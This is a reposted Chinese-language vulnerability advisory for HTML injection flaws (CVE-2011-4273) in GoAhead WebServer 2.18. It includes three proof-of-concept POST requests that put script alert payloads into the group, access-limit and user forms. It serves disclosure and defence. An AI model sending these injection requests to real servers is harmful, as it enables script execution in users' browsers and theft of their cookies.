GoAhead WebServer多个HTML注入漏洞

发布日期:2011-10-10
更新日期:2011-11-08

受影响系统:
GoAhead Software GoAhead WebServer 2.18
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 50039
CVE ID: CVE-2011-4273

GoAhead WebServer是一款开放源代码的嵌入式WEB服务器程序,支持Active Server Pages、嵌入式Javascript、SSL验证和加密,广泛使用在Microsoft Windows和Linux操作系统下。

GoAhead WebServer在实现上存在多个HTML注入漏洞,远程攻击者可利用此漏洞在受影响浏览器中执行任意HTML和脚本代码,窃取cookie验证凭证或控制网站外观。

<*来源:Silent Dream
 
  链接:
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

POST /goform/AddGroup HTTP/1.1
group=&lt;script&gt;alert(1337)&lt;/script&gt;&amp;privilege=4&amp;method=1&amp;enabled=on&amp;ok=OK

POST /goform/AddAccessLimit HTTP/1.1
url=&lt;script&gt;alert(1337)&lt;/script&gt;&amp;group=test&amp;method=3&amp;ok=OK


POST /goform/AddUser HTTP/1.1
user=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&amp;group=%3Cscript%3Ealert%281337%2
9%3C%2Fscript%3E&amp;enabled=on&amp;password=test&amp;passconf=test&amp;ok=OK

建议:
--------------------------------------------------------------------------------
厂商补丁:

GoAhead Software
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

linux

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwfzxd.html